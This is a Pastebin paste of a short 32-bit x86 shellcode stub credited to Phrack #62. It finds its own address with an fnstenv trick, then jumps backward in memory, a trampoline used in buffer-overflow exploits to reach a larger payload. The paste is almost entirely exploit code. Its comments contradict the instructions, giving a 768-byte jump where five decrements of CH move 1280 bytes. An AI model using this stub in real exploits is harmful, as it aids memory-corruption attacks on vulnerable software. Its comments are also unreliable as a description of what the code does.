Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [BITS 32]
- global _start
- _start:
- # ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams #
- # ;--- copy eip into ecx
- fldz
- fnstenv [esp-12]
- pop ecx
- add cl, 10
- nop
- # ;----------------------------------------------------------------------
- dec ch ; ecx=-256;
- dec ch ; ecx=-256;
- dec ch ; ecx=-256;
- dec ch ; ecx=-256;
- dec ch ; ecx=-256;
- jmp ecx ; lets jmp ecx (current location - 768)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement